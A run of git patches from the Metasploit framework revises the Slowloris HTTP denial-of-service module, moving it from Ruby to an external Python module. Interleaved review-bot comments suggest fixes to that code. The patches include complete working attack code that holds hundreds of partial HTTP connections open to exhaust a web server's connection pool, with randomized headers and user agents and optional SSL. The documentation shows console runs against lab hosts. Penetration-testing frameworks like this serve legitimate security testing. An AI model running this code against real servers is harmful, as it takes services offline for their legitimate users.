@@ -1,4 +1,4 @@ -Vulnerable Application +## Vulnerable Application This module tries to keep many connections to the target web server open and hold them open as long as possible. @@ -9,7 +9,7 @@ Vulnerable app versions include: Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). -Verification Steps +## Verification Steps 1. Start msfconsole 2. Do: use auxiliary/dos/http/slow_loris @@ -17,9 +17,9 @@ Verification Steps 4. Do: run 5. Visit server URL in your web-browser. -Scenarios +## Scenarios -Apache/2.2.8 - Ubuntu 8.04 +### Apache/2.2.8 - Ubuntu 8.04 ``` msf > use auxiliary/dos/http/slow_loris.rb From b7bc68c84334fbfb65d24fae2cad57d1434ee561 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 8 Nov 2017 21:55:53 +0000 Subject: [PATCH 191/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 27 ++++++++++++------------ 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 1897c11b1a..3d1a40d4ca 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb 
@@ -11,8 +11,8 @@ class MetasploitModule < Msf::Auxiliary super(update_info( info, 'Name' => 'Slow Loris DoS', - 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. - It accomplishes this by opening connections to the target web server and sending a partial request. + 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, 'Author' => @@ -31,8 +31,8 @@ class MetasploitModule < Msf::Auxiliary register_options( [ Opt::RPORT(80), - OptInt.new('THREADS', [true, 'The number of concurrent threads', 5000]), - OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 60]) + OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]), + OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]) ]) end @@ -40,25 +40,24 @@ class MetasploitModule < Msf::Auxiliary datastore['THREADS'] end - def timeout - datastore['TIMEOUT'] + def headers + datastore['HEADERS'] end def run starting_thread = 1 header = "GET / HTTP/1.1\r\n" threads = [] - while true do - - ubound = [thread_count].min - print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") - - 1.upto(ubound) do |i| + + loop do + print_status("Executing requests #{starting_thread} - #{(starting_thread + [thread_count].min) - 1}...") + + 1.upto([thread_count].min) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin connect() sock.puts(header) - 10.times do + headers.times do data = "X-a-#{rand(0..1000)}: b\r\n" sock.puts(data) sleep rand(1..15) 
@@ -67,7 +66,7 @@ class MetasploitModule < Msf::Auxiliary end end threads.each(&:join) - starting_thread += ubound + starting_thread += [thread_count].min end end end From 6d2007a4dbb6875642a6138fc857808c4e4e52ad Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 8 Nov 2017 22:04:51 +0000 Subject: [PATCH 192/254] Update slow_loris.md --- .../modules/auxiliary/dos/http/slow_loris.md | 28 +++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md index b7af5c00e4..0ef5db604d 100644 --- a/documentation/modules/auxiliary/dos/http/slow_loris.md +++ b/documentation/modules/auxiliary/dos/http/slow_loris.md @@ -2,19 +2,19 @@ This module tries to keep many connections to the target web server open and hold them open as long as possible. +To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). + Vulnerable app versions include: - Apache HTTP Server 1.x and 2.x - Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta -Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). - ## Verification Steps 1. Start msfconsole -2. Do: use auxiliary/dos/http/slow_loris -3. Do: set RHOST -4. Do: run +2. Do: `use auxiliary/dos/http/slow_loris` +3. Do: `set RHOST` +4. Do: `run` 5. Visit server URL in your web-browser. ## Scenarios 
@@ -22,22 +22,22 @@ Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sou ### Apache/2.2.8 - Ubuntu 8.04 ``` -msf > use auxiliary/dos/http/slow_loris.rb -msf auxiliary(slow_loris) > show options +msf > use auxiliary/dos/http/slow_loris5 +msf auxiliary(slow_loris5) > show options -Module options (auxiliary/dos/http/slow_loris): +Module options (auxiliary/dos/http/slow_loris5): Name Current Setting Required Description ---- --------------- -------- ----------- - RHOST 192.168.216.129 yes The target address + HEADERS 10 yes The number of custom headers sent by each thread + RHOST yes The target address RPORT 80 yes The target port (TCP) - THREADS 5000 yes The number of concurrent threads - TIMEOUT 60 yes The maximum time in seconds to wait for each request to finish + THREADS 1000 yes The number of concurrent threads -msf auxiliary(slow_loris) > set RHOST 192.168.216.129 +msf auxiliary(slow_loris5) > set RHOST 192.168.216.129 RHOST => 192.168.216.129 -msf auxiliary(slow_loris) > run +msf auxiliary(slow_loris5) > run -[*] 192.168.216.129:80 - Executing requests 1 - 5000... +[*] 192.168.216.129:80 - Executing requests 1 - 1000... ``` From aa16288140892ca046a87457785476ddfcb4116f Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 9 Nov 2017 19:55:28 +0000 Subject: [PATCH 193/254] Update slow_loris.md --- documentation/modules/auxiliary/dos/http/slow_loris.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md index 0ef5db604d..26d66104bf 100644 --- a/documentation/modules/auxiliary/dos/http/slow_loris.md +++ b/documentation/modules/auxiliary/dos/http/slow_loris.md 
@@ -22,10 +22,10 @@ Vulnerable app versions include: ### Apache/2.2.8 - Ubuntu 8.04 ``` -msf > use auxiliary/dos/http/slow_loris5 -msf auxiliary(slow_loris5) > show options +msf > use auxiliary/dos/http/slow_loris +msf auxiliary(slow_loris) > show options -Module options (auxiliary/dos/http/slow_loris5): +Module options (auxiliary/dos/http/slow_loris): Name Current Setting Required Description ---- --------------- -------- ----------- @@ -34,9 +34,9 @@ Module options (auxiliary/dos/http/slow_loris5): RPORT 80 yes The target port (TCP) THREADS 1000 yes The number of concurrent threads -msf auxiliary(slow_loris5) > set RHOST 192.168.216.129 +msf auxiliary(slow_loris) > set RHOST 192.168.216.129 RHOST => 192.168.216.129 -msf auxiliary(slow_loris5) > run +msf auxiliary(slow_loris) > run [*] 192.168.216.129:80 - Executing requests 1 - 1000... From 74becb69e8e266e11480bb418be37c64d569952e Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 9 Nov 2017 19:58:10 +0000 Subject: [PATCH 194/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 3d1a40d4ca..6aacb93d2d 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary info, 'Name' => 'Slow Loris DoS', 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. - It accomplishes this by opening connections to the target web server and sending a partial request. + It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, 'Author' => 
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Auxiliary [ Opt::RPORT(80), OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]), - OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]) + OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]), + OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]) ]) end @@ -43,16 +44,20 @@ class MetasploitModule < Msf::Auxiliary def headers datastore['HEADERS'] end + + def timeout + datastore['TIMEOUT'] + end def run starting_thread = 1 header = "GET / HTTP/1.1\r\n" threads = [] - + loop do - print_status("Executing requests #{starting_thread} - #{(starting_thread + [thread_count].min) - 1}...") - - 1.upto([thread_count].min) do |i| + print_status("Executing requests #{starting_thread} - #{(starting_thread + thread_count) - 1}...") + + 1.upto(thread_count) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin connect() @@ -60,13 +65,13 @@ class MetasploitModule < Msf::Auxiliary headers.times do data = "X-a-#{rand(0..1000)}: b\r\n" sock.puts(data) - sleep rand(1..15) + sleep rand(1..timeout) end end end end threads.each(&:join) - starting_thread += [thread_count].min + starting_thread += thread_count end end end From 52f56527d80b1435c85d832f559d967417c6d007 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 9 Nov 2017 20:04:40 +0000 Subject: [PATCH 195/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 6aacb93d2d..d1b38d0377 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb 
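Review bot: `sleep rand(1..timeout)` breaks the worker when TIMEOUT is set to 0 or a negative number, because `rand` over an empty range returns nil and `sleep(nil)` raises TypeError; `OptInt` enforces no lower bound, so validate it before the loop, e.g. `fail_with(Failure::BadConfig, 'TIMEOUT must be at least 1') if timeout < 1`. The reinstated option text "The maximum time in seconds to wait for each request to finish" no longer describes what the value does: it is now the upper bound of the random pause between two headers on one connection, so the description in the `register_options` hunk should say so. The `run` method starts outside the last hunk.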
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info( info, 'Name' => 'Slow Loris DoS', - 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary Opt::RPORT(80), OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]), OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]), - OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]) + OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]) ]) end @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary def headers datastore['HEADERS'] end - + def timeout datastore['TIMEOUT'] end From e07fe77a69aac59622caedfaec0828c8e1920d81 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Mon, 13 Nov 2017 18:51:07 -0500 Subject: [PATCH 196/254] Close sockets to resolve file handle error --- modules/auxiliary/dos/http/slow_loris.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index d1b38d0377..5d96e3ad85 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb 
@@ -60,13 +60,14 @@ class MetasploitModule < Msf::Auxiliary 1.upto(thread_count) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin - connect() - sock.puts(header) + current_sock = connect(global=false) + current_sock.puts(header) headers.times do data = "X-a-#{rand(0..1000)}: b\r\n" - sock.puts(data) + current_sock.puts(data) sleep rand(1..timeout) end + disconnect(nsock=current_sock) end end end From db2bd22d860151d45ac761bda1fcee93ccf66b7a Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 14 Nov 2017 21:11:17 +0000 Subject: [PATCH 197/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 5d96e3ad85..daaa116ec0 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -63,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary current_sock = connect(global=false) current_sock.puts(header) headers.times do - data = "X-a-#{rand(0..1000)}: b\r\n" + data = Rex::Text.rand_text_alpha(3) + "-#{rand(0..1000)}: b\r\n" current_sock.puts(data) sleep rand(1..timeout) end From b6c81e6da0513a6e8a9b99272d884006453f094b Mon Sep 17 00:00:00 2001 
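Review bot: `disconnect(nsock=current_sock)` is only reached on the happy path; the visible `begin … end` has no `rescue` or `ensure`, so when a `puts` raises (peer reset, timeout) the thread ends with its socket still open until garbage collection, which is the handle exhaustion this commit sets out to fix. Move the close into an `ensure` clause: `ensure` / `disconnect(current_sock) if current_sock`. `connect(global=false)` and `disconnect(nsock=current_sock)` also assign throwaway locals named `global` and `nsock` rather than naming the parameters — Ruby passes these positionally — so `connect(false)` and `disconnect(current_sock)` say the same thing without the misleading assignment. The enclosing `run` method starts and ends outside the hunk.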
From: Matthew Kienow Date: Tue, 21 Nov 2017 16:21:01 -0500 Subject: [PATCH 198/254] Reimplement slowloris as external module --- .../modules/auxiliary/dos/http/slow_loris.md | 43 ------ .../modules/auxiliary/dos/http/slowloris.md | 47 +++++++ .../external/python/metasploit/module.py | 6 +- modules/auxiliary/dos/http/slow_loris.rb | 78 ----------- modules/auxiliary/dos/http/slowloris.py | 130 ++++++++++++++++++ 5 files changed, 180 insertions(+), 124 deletions(-) delete mode 100644 documentation/modules/auxiliary/dos/http/slow_loris.md create mode 100644 documentation/modules/auxiliary/dos/http/slowloris.md delete mode 100644 modules/auxiliary/dos/http/slow_loris.rb create mode 100755 modules/auxiliary/dos/http/slowloris.py diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md deleted file mode 100644 index 26d66104bf..0000000000 --- a/documentation/modules/auxiliary/dos/http/slow_loris.md +++ /dev/null 
@@ -1,43 +0,0 @@ -## Vulnerable Application - -This module tries to keep many connections to the target web server open and hold them open as long as possible. - -To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). - -Vulnerable app versions include: - -- Apache HTTP Server 1.x and 2.x -- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta - -## Verification Steps - -1. Start msfconsole -2. Do: `use auxiliary/dos/http/slow_loris` -3. Do: `set RHOST` -4. Do: `run` -5. Visit server URL in your web-browser. - -## Scenarios - -### Apache/2.2.8 - Ubuntu 8.04 - -``` -msf > use auxiliary/dos/http/slow_loris -msf auxiliary(slow_loris) > show options - -Module options (auxiliary/dos/http/slow_loris): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - HEADERS 10 yes The number of custom headers sent by each thread - RHOST yes The target address - RPORT 80 yes The target port (TCP) - THREADS 1000 yes The number of concurrent threads - -msf auxiliary(slow_loris) > set RHOST 192.168.216.129 -RHOST => 192.168.216.129 -msf auxiliary(slow_loris) > run - -[*] 192.168.216.129:80 - Executing requests 1 - 1000... - -``` diff --git a/documentation/modules/auxiliary/dos/http/slowloris.md b/documentation/modules/auxiliary/dos/http/slowloris.md new file mode 100644 index 0000000000..dfa1937774 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/slowloris.md 
@@ -0,0 +1,47 @@ +## Vulnerable Application + +This module tries to keep many connections to the target web server open and hold them open as long as possible. + +To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). + +Vulnerable application versions include: + +- Apache HTTP Server 1.x and 2.x +- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta + +## Verification Steps + +1. Start msfconsole +2. Do: `use auxiliary/dos/http/slowloris` +3. Do: `set RHOST` +4. Do: `run` +5. Visit server URL in your web-browser. + +## Scenarios + +### Apache/2.2.8 - Ubuntu 8.04 + +``` +msf > use auxiliary/dos/http/slowloris +msf auxiliary(slowloris) > show options + +Module options (auxiliary/dos/http/slowloris): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + delay 15 yes The delay between sending keep-alive headers + rand_user_agent true yes Randomizes user-agent with each request + rhost 172.28.128.4 yes The target address + rport 80 yes The target port + sockets 150 yes The number of sockets to use in the attack + ssl false yes Negotiate SSL/TLS for outgoing connections + +msf auxiliary(slowloris) > set rhost 172.28.128.4 +rhost => 172.28.128.4 +msf auxiliary(slowloris) > run + +[*] Starting server... +[*] Attacking 172.28.128.4 with 150 sockets +[*] Creating sockets... +[*] Sending keep-alive headers... Socket count: 150 +``` diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 2f12c8210d..9b5b563c6a 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py 
@@ -21,15 +21,15 @@ def report_service(ip, opts={}): }}) -def run(metadata, exploit): +def run(metadata, module_callback): req = json.loads(os.read(0, 10000)) if req['method'] == 'describe': rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': args = req['params'] - exploit(args) + module_callback(args) rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': { - 'message': 'Exploit completed' + 'message': 'Module completed' }}) def rpc_send(req): diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb deleted file mode 100644 index daaa116ec0..0000000000 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ /dev/null 
@@ -1,78 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info( - info, - 'Name' => 'Slow Loris DoS', - 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. - It accomplishes this by opening connections to the target web server and sending a partial request. - Periodically, it will send subsequent requests, adding to but never completing the request.}, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'RSnake', # Vulnerability disclosure - 'Daniel Teixeira' # Metasploit module - ], - 'References' => - [ - [ 'CVE', '2007-6750' ], - [ 'CVE', '2010-2227' ], - [ 'URL', 'https://www.exploit-db.com/exploits/8976/' ] - ], - )) - - register_options( - [ - Opt::RPORT(80), - OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]), - OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]), - OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]) - ]) - end - - def thread_count - datastore['THREADS'] - end - - def headers - datastore['HEADERS'] - end - - def timeout - datastore['TIMEOUT'] - end - - def run - starting_thread = 1 - header = "GET / HTTP/1.1\r\n" - threads = [] - - loop do - print_status("Executing requests #{starting_thread} - #{(starting_thread + thread_count) - 1}...") - - 1.upto(thread_count) do |i| - threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| - begin - current_sock = connect(global=false) - current_sock.puts(header) - headers.times do - data = Rex::Text.rand_text_alpha(3) + "-#{rand(0..1000)}: b\r\n" - current_sock.puts(data) - sleep rand(1..timeout) - end - 
disconnect(nsock=current_sock) - end - end - end - threads.each(&:join) - starting_thread += thread_count - end - end -end diff --git a/modules/auxiliary/dos/http/slowloris.py b/modules/auxiliary/dos/http/slowloris.py new file mode 100755 index 0000000000..81ddaa1b5f --- /dev/null +++ b/modules/auxiliary/dos/http/slowloris.py 
@@ -0,0 +1,130 @@ +#!/usr/bin/env python +# Note, works with both python 2.7 and 3 + +import random +import socket +import ssl +import sys +import time + +from metasploit import module + +metadata = { + 'name': 'Slowloris Denial of Service Attack', + 'description': ''' + Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + It accomplishes this by opening connections to the target web server and sending a partial request. + Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request. + Affected servers will keep these connections open, filling their maximum concurrent connection pool, + eventually denying additional connection attempts from clients. + ''', + 'authors': [ + 'RSnake', # Vulnerability disclosure + 'Gokberk Yaltirakli', # Simple slowloris in Python + 'Daniel Teixeira', # Metasploit module (Ruby) + 'Matthew Kienow ' # Metasploit external module (Python) + ], + 'date': '2009-06-17', + 'references': [ + {'type': 'cve', 'ref': '2007-6750'}, + {'type': 'cve', 'ref': '2010-2227'}, + {'type': 'url', 'ref': 'https://www.exploit-db.com/exploits/8976/'}, + {'type': 'url', 'ref': 'https://github.com/gkbrk/slowloris'} + ], + 'type': 'dos', + 'options': { + 'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None}, + 'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 80}, + 'sockets': {'type': 'int', 'description': 'The number of sockets to use in the attack', 'required': True, 'default': 150}, + 'delay': {'type': 'int', 'description': 'The delay between sending keep-alive headers', 'required': True, 'default': 15}, + 'ssl': {'type': 'bool', 'description': 'Negotiate SSL/TLS for outgoing connections', 'required': True, 'default': False}, + 'rand_user_agent': {'type': 'bool', 'description': 'Randomizes user-agent with each request', 'required': True, 'default': True} + }} + +list_of_sockets = 
[] +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + +def init_socket(host, port, use_ssl=False, rand_user_agent=True): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(4) + + if use_ssl: + s = ssl.wrap_socket(s) + + s.connect((host, port)) + + s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) + + if rand_user_agent: + s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8")) + else: + s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8")) + + s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) + return s + +def run(args): + host = args['rhost'] + port = int(args['rport']) + use_ssl = args['ssl'] == "true" + rand_user_agent = args['rand_user_agent'] == "true" + socket_count = int(args['sockets']) + delay = int(args['delay']) + + module.log("Attacking %s with %s sockets" % (host, socket_count), 'info') + + module.log("Creating sockets...", 'info') + for i in range(socket_count): + try: + module.log("Creating socket number %s" % (i), 'debug') + s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) + except socket.error: + break + list_of_sockets.append(s) + + while True: + module.log("Sending 
keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info') + for s in list(list_of_sockets): + try: + s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8")) + except socket.error: + list_of_sockets.remove(s) + + for _ in range(socket_count - len(list_of_sockets)): + module.log("Recreating socket...", 'debug') + try: + s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) + if s: + list_of_sockets.append(s) + except socket.error: + break + time.sleep(delay) + +if __name__ == "__main__": + module.run(metadata, run) From 785e5944d665786b273ae067f908bd64215493a0 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 21 Nov 2017 18:19:20 -0500 Subject: [PATCH 199/254] Enhanced slowloris HTTP headers and minor cleanup --- modules/auxiliary/dos/http/slowloris.py | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/slowloris.py b/modules/auxiliary/dos/http/slowloris.py index 81ddaa1b5f..416b1bbf5e 100755 --- a/modules/auxiliary/dos/http/slowloris.py +++ b/modules/auxiliary/dos/http/slowloris.py @@ -4,7 +4,7 @@ import random import socket import ssl -import sys +import string import time from metasploit import module @@ -70,6 +70,11 @@ user_agents = [ "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", ] + +def create_random_header_name(size=8, seq=string.ascii_uppercase + string.ascii_lowercase): + return ''.join(random.choice(seq) for _ in range(size)) + + def init_socket(host, port, use_ssl=False, rand_user_agent=True): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) @@ -89,6 +94,7 @@ def init_socket(host, port, use_ssl=False, rand_user_agent=True): s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) return s + def run(args): host = args['rhost'] port = int(args['rport']) 
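Review bot: The `user_agents` list is missing a comma after the `Edge/14.14393` entry, so Python's implicit string concatenation fuses that line with the following `Chrome/53.0.2785.143` entry into one malformed User-Agent value; add the comma. The `if s:` guard in the recreate loop is always true because `init_socket` either returns a socket or raises, so it can be dropped. Both `except socket.error: break` branches abandon socket creation silently; logging the exception with `module.log(str(e), 'error')` before the `break` would make the failure visible to the operator. `args['ssl'] == "true"` and the matching `rand_user_agent` comparison presumably rely on the bridge passing option values as strings even though the metadata declares them `bool` — a one-line comment on those lines would save the next reader a trip to the framework.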
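Review bot: The default `seq=string.ascii_uppercase + string.ascii_lowercase` in `create_random_header_name` is exactly `string.ascii_letters`, which reads more directly. The helper also lacks a docstring; `"""Return a random header name of `size` characters drawn from `seq`."""` documents the contract.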
